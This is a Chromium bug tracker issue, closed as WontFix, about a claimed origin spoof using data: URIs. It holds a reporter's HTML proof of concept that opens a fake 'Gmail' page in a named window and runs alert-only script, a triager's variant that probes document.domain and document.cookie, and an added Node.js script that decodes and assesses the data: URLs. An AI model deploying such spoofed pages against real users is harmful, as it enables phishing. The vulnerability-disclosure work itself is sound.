Issue 599956


Issue metadata

Status: WontFix
Owner: ----
Closed: Apr 2016
Cc:
EstimatedDays: ----
NextAction: ----
OS: ----
Pri: ----
Type: Bug-Security

Security:chrome URL And Javascript Prompt Origin Spoof

Reported by nani528g...@gmail.com, Apr 1 2016

Issue description

Hi,

Chrome URL and JavaScript prompt origin spoof will be possible by using data: URIs.

Here is the PoC HTML file:


<a href="https://www.gmail.com:443." target="aa" onclick="setTimeout('fake()',100)"><h1>click me</h1></a>
<script>
function fake() {
var t = window.open('data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTs8L3NjcmlwdD4=','aa');
t.document.body.innerHTML = '<title>Gmail</title><H1>Fake Page!!!--hack by xisigr</H1>';
}
</script>

If any user clicks the link we can execute JavaScript through URIs.

Just open the PoC in Google Chrome; when you click, you are able to execute xx.

Attachment: url.html (329 bytes)
Cc: palmer@chromium.org
Components: Security>UX
Hi Chris,

I'm wondering if you could help triage this bug (and add labels if appropriate)? Thanks for your time!
Cc: mkwst@chromium.org
Status: WontFix (was: Unconfirmed)
It is working as intended for data: URIs to be able to contain JavaScript code. (Whether or not supporting top-level navigation to data: URIs is working as intended is, I understand, a point of debate. +mkwst for that.)

If you change the code to alert(document.domain), you can see that the code runs in the null origin, and that attempting to access document.cookie results in a security exception (look in the JavaScript console).

<a href="https://www.gmail.com:443." target="aa" onclick="setTimeout('fake()',100)"><h1>click me</h1></a>
<script>
function fake() {
//var t = window.open('data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTs8L3NjcmlwdD4=','aa');
// document.domain:
//var t = window.open('data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5kb21haW4pOzwvc2NyaXB0Pg==','aa');
// document.cookie:
var t = window.open('data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpOzwvc2NyaXB0Pg==','aa');
t.document.body.innerHTML = '<title>Gmail</title><H1>Fake Page!!!--hack by xisigr</H1>';
}
</script>

So, I don't see a bug here.
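The origin point made in the comment above, as an added example that is not part of the bug thread: a small Node.js script (the names parseDataUrl and assessDataUrl are assumptions of this example) that parses the three data: URLs from the PoC per RFC 2397, decodes their bodies, and reports the opaque origin a top-level navigation to each one would run in.

```javascript
// Added example, not from the bug report: parse the data: URLs in the PoC and
// report what a top-level navigation to each one would produce.

// Parse an RFC 2397 data: URL into media type, parameters, encoding and decoded
// body. Returns null for anything that is not a data: URL.
function parseDataUrl(url) {
  const m = /^data:([^,]*),(.*)$/s.exec(url);
  if (!m) return null;
  const parts = m[1].split(';');
  const isBase64 = parts.length > 1 && parts[parts.length - 1] === 'base64';
  if (isBase64) parts.pop();
  const mediaType = parts.shift() || 'text/plain'; // RFC 2397 default
  const params = {};
  for (const p of parts) {
    const [k, v] = p.split('=');
    if (k) params[k] = v;
  }
  const body = isBase64
    ? Buffer.from(m[2], 'base64').toString('utf8')
    : decodeURIComponent(m[2]);
  return { mediaType, params, isBase64, body };
}

// Assess a data: URL as a reviewer would: an HTML body containing script runs
// when the URL is opened, but in an opaque origin (serialised as "null"), so
// it cannot read the opener's cookies or DOM; the risk is UI spoofing.
function assessDataUrl(url) {
  const parsed = parseDataUrl(url);
  if (!parsed) return null;
  const isHtml = parsed.mediaType.toLowerCase() === 'text/html';
  const hasScript = /<script[\s>]/i.test(parsed.body) || /\son\w+\s*=/i.test(parsed.body);
  return {
    mediaType: parsed.mediaType,
    origin: new URL(url).origin, // "null" for data: per the URL Standard
    executesScript: isHtml && hasScript,
    body: parsed.body,
  };
}

// The three data: URLs from the report, copied here as literals.
const POC_URLS = [
  'data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTs8L3NjcmlwdD4=',
  'data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5kb21haW4pOzwvc2NyaXB0Pg==',
  'data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpOzwvc2NyaXB0Pg==',
];

for (const u of POC_URLS) console.log(assessDataUrl(u));
```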
Comment 3 by sheriffbot@chromium.org, Jul 12 2016

Labels: -Restrict-View-SecurityTeam
This bug has been closed for more than 14 weeks. Removing security view restrictions.

For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot
Comment 4 by sheriffbot@chromium.org, Oct 1 2016

This bug has been closed for more than 14 weeks. Removing security view restrictions.

For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot
Comment 5 by sheriffbot@chromium.org, Oct 2 2016

This bug has been closed for more than 14 weeks. Removing security view restrictions.

For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot
Labels: allpublic
Components: -Security>UX
Labels: Team-Security-UX
Security>UX component is deprecated in favor of the Team-Security-UX label